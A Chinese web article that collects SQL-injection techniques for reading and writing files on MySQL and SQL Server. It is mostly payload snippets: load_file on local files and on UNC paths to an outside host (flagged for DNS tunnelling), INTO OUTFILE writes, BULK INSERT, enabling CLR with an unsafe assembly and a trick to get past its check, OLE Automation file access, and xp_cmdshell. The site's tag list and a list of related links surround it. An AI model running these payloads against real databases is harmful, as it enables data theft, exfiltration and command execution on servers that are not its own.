主頁 > 知識庫 > 關(guān)于SQL注入中文件讀寫的方法總結(jié)

關(guān)于SQL注入中文件讀寫的方法總結(jié)

熱門標(biāo)簽:簡單的智能語音電銷機(jī)器人 南昌呼叫中心外呼系統(tǒng)哪家好 小程序智能電話機(jī)器人 怎么申請400熱線電話 泗洪正規(guī)電話機(jī)器人找哪家 怎么去開發(fā)一個(gè)電銷機(jī)器人 河北便宜電銷機(jī)器人軟件 湖南保險(xiǎn)智能外呼系統(tǒng)產(chǎn)品介紹 ai電話電話機(jī)器人

前言

SQL注入有直接sql注入也有文件讀寫時(shí)的注入了我們這篇文章介紹的是SQL注入中的文件讀寫這一塊的內(nèi)容,具體的一起來看看。

一、MySQL

讀文件

常見的讀文件,可以用16進(jìn)制代替字符串

select load_file('c:/boot.ini')
select load_file(0x633a2f626f6f742e696e69)
select load_file('//ecma.io/1.txt') # smb協(xié)議
select load_file('\\\\ecma.io\\1.txt') # 可用于DNS隧道

寫文件

我暫時(shí)已知l兩種寫文件的方式

select 0x313233 into outfile 'D:/1.txt'
select 0x313233 into dumpfile 'D:/1.txt'

二、 SQL Server

讀文件

1. BULK INSERT

create table result(res varchar(8000));
bulk insert result from 'd:/1.txt';

2. CLR集成

// 開啟CLR集成
exec sp_configure 'show advanced options',1;
reconfigure;
exec sp_configure 'clr enabled',1
reconfigure
create assembly sqb from 'd:\1.exe' with permission_set=unsafe

上面一句可以利用create assembly函數(shù)從遠(yuǎn)程服務(wù)器加載任何.NET二進(jìn)制文件到數(shù)據(jù)庫中;但是他會驗(yàn)證是否為合法.NET程序,導(dǎo)致失敗,下面是讀取方式

select master.dbo.fn_varbintohexstr(cast(content as varbinary)) from sys.assembly_files

繞過,首先加載一個(gè)有效的.NET的二進(jìn)制文件,然后追加文件即可,下面是繞過方法。

create assembly sqb from 'd:\net.exe';
alter assembly sqb add file from 'd:\1.txt'
alter assembly sqb add file from 'd:\notnet.exe'

3. Script.FileSystemObject

# 開啟Ole Automation Procedures
 
sp_configure 'show advanced options',1;
RECONFIGURE;
sp_configure 'Ole Automation Procedures',1;
RECONFIGURE;
declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate 'scripting.filesystemobject',@o out
exec sp_oamethod @o, 'opentextfile', @f out, 'd:\1.txt', 1
exec @ret = sp_onmethod @f, 'readline', @line out
while(@ret = 0) begin print @line exec @ret = sp_oamethod @f, 'readline', @line out end

寫文件

1. Script.FileSystemObject

declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate 'scripting.filesystemobject',@o out
exec sp_oamethod @o, 'createtextfile', @f out, 'e:\1.txt', 1
exec @ret = sp_oamethod @f, 'writeline', NULL ,'This is the test string'

2. BCP復(fù)制文件(測試失敗,無bcp.exe)

c:\windows>system32>bcp "select name from sysobjects" query testout.txt -c -s 127.0.0.1 -U sa -p"sa"

3. xp_cmdshell

exec xp_cmdshell 'echo test>d:\1.txt'

三、Oracle

pass,Oracle太坑了~~~幾乎都受到PL/SQL的限制,暫時(shí)不討論

總結(jié)

以上就是關(guān)于SQL注入中文件的讀寫方法總結(jié),希望本文的內(nèi)容對大家的學(xué)習(xí)或者工作能帶來一定的幫助,如果有疑問大家可以留言交流。

您可能感興趣的文章:
  • 利用SQL注入漏洞登錄后臺的實(shí)現(xiàn)方法
  • 有效防止SQL注入的5種方法總結(jié)
  • 利用SQL注入漏洞拖庫的方法
  • SQL注入中繞過 單引號 限制繼續(xù)注入
  • sql注入之手工注入示例詳解
  • MySQL 及 SQL 注入與防范方法
  • 防御SQL注入的方法總結(jié)
  • SQL數(shù)據(jù)庫的高級sql注入的一些知識
  • SQL 注入式攻擊的終極防范
  • sql注入教程之類型以及提交注入

標(biāo)簽:柳州 淮安 江蘇 瀘州 那曲 威海 荊門 景德鎮(zhèn)

巨人網(wǎng)絡(luò)通訊聲明:本文標(biāo)題《關(guān)于SQL注入中文件讀寫的方法總結(jié)》,本文關(guān)鍵詞  關(guān)于,SQL,注入,中,文件,讀,;如發(fā)現(xiàn)本文內(nèi)容存在版權(quán)問題,煩請?zhí)峁┫嚓P(guān)信息告之我們,我們將及時(shí)溝通與處理。本站內(nèi)容系統(tǒng)采集于網(wǎng)絡(luò),涉及言論、版權(quán)與本站無關(guān)。
  • 相關(guān)文章
  • 下面列出與本文章《關(guān)于SQL注入中文件讀寫的方法總結(jié)》相關(guān)的同類信息!
  • 本頁收集關(guān)于關(guān)于SQL注入中文件讀寫的方法總結(jié)的相關(guān)信息資訊供網(wǎng)民參考!
  • 推薦文章